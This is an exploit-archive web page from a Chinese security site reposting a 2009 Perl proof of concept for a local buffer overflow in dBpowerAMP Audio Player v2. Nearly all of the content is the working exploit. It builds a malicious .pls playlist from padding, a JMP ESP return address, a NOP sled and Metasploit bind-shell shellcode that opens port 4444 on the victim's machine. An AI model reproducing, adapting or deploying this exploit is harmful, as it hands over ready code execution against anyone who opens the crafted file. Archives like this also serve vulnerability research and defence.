首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
dBpowerAMP Audio Player v2 (.pls File) Local BOF Exploit (1735)
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02   
#  dBpowerAMP Audio Player v2 ( .pls file)  LoCaL BufferOverFlow Exploit
#  Exploited By AlpHaNiX
#  From NullArea.Net
#  Thanks Stack For The PoC
system("cls") ;
print "\n\n\n[+] dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit" ;
my $blah= "\x41" x 600;
my $nop = "\x90" x 52 ;
my $ret = "\xC7\xEB\xFA\x75" ;   # 77C80F1A  JMP ESP [ntdll v6.0 vista en ultimate]  
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50".
"\x80\x56\xea\x83\xeb\xfc\xe2\xf4\xac\xea\xbd\xa7\xb8\x79\xa9\x15".
"\xaf\xe0\xdd\x86\x74\xa4\xdd\xaf\x6c\x0b\x2a\xef\x28\x81\xb9\x61".
"\x1f\x98\xdd\xb5\x70\x81\xbd\xa3\xdb\xb4\xdd\xeb\xbe\xb1\x96\x73".
"\xfc\x04\x96\x9e\x57\x41\x9c\xe7\x51\x42\xbd\x1e\x6b\xd4\x72\xc2".
"\x25\x65\xdd\xb5\x74\x81\xbd\x8c\xdb\x8c\x1d\x61\x0f\x9c\x57\x01".
"\x53\xac\xdd\x63\x3c\xa4\x4a\x8b\x93\xb1\x8d\x8e\xdb\xc3\x66\x61".
"\x10\x8c\xdd\x9a\x4c\x2d\xdd\xaa\x58\xde\x3e\x64\x1e\x8e\xba\xba".
"\xaf\x56\x30\xb9\x36\xe8\x65\xd8\x38\xf7\x25\xd8\x0f\xd4\xa9\x3a".
"\x38\x4b\xbb\x16\x6b\xd0\xa9\x3c\x0f\x09\xb3\x8c\xd1\x6d\x5e\xe8".
"\x05\xea\x54\x15\x80\xe8\x8f\xe3\xa5\x2d\x01\x15\x86\xd3\x05\xb9".
"\x03\xd3\x15\xb9\x13\xd3\xa9\x3a\x36\xe8\x47\xb6\x36\xd3\xdf\x0b".
"\xc5\xe8\xf2\xf0\x20\x47\x01\x15\x86\xea\x46\xbb\x05\x7f\x86\x82".
"\xf4\x2d\x78\x03\x07\x7f\x80\xb9\x05\x7f\x86\x82\xb5\xc9\xd0\xa3".
"\x07\x7f\x80\xba\x04\xd4\x03\x15\x80\x13\x3e\x0d\x29\x46\x2f\xbd".
"\xaf\x56\x03\x15\x80\xe6\x3c\x8e\x36\xe8\x35\x87\xd9\x65\x3c\xba".
"\x09\xa9\x9a\x63\xb7\xea\x12\x63\xb2\xb1\x96\x19\xfa\x7e\x14\xc7".
"\xae\xc2\x7a\x79\xdd\xfa\x6e\x41\xfb\x2b\x3e\x98\xae\x33\x40\x15".
"\x25\xc4\xa9\x3c\x0b\xd7\x04\xbb\x01\xd1\x3c\xeb\x01\xd1\x03\xbb".
"\xaf\x50\x3e\x47\x89\x85\x98\xb9\xaf\x56\x3c\x15\xaf\xb7\xa9\x3a".
"\xdb\xd7\xaa\x69\x94\xe4\xa9\x3c\x02\x7f\x86\x82\xa0\x0a\x52\xb5".
"\x03\x7f\x80\x15\x80\x80\x56\xea";
my $buff =  $blah.$ret.$nop.$shellcode ;
open(pls, "> alp1x.pls");
my $plsfile = '[playlist]'."\r\n".
               'NumberOfEntries=1'."\r\n".
               "File1=http://".$buff  ;
print pls $plsfile ;
close (pls);
print "\n[!] File Creation Done !";

# [2009-01-29]
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WFTPD Explorer Pro 1.0 Remote
·Motorola Wimax modem CPEi300 (
·Internet Explorer 7 ClickJacki
·NetArtMedia Car Portal 1.0 (Au
·GLPI v 0.71.3 Multiple Remote
·PLE CMS 1.0 beta 4.2 (login.ph
·WOW - Web On Windows ActiveX C
·ManageEngine Firewall Analyzer
·Coppermine Photo Gallery 1.4.1
·Profense Web Application Firew
·Star Articles 6.0 (admin.manag
·D-Link VoIP Phone Adapter XSS/
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved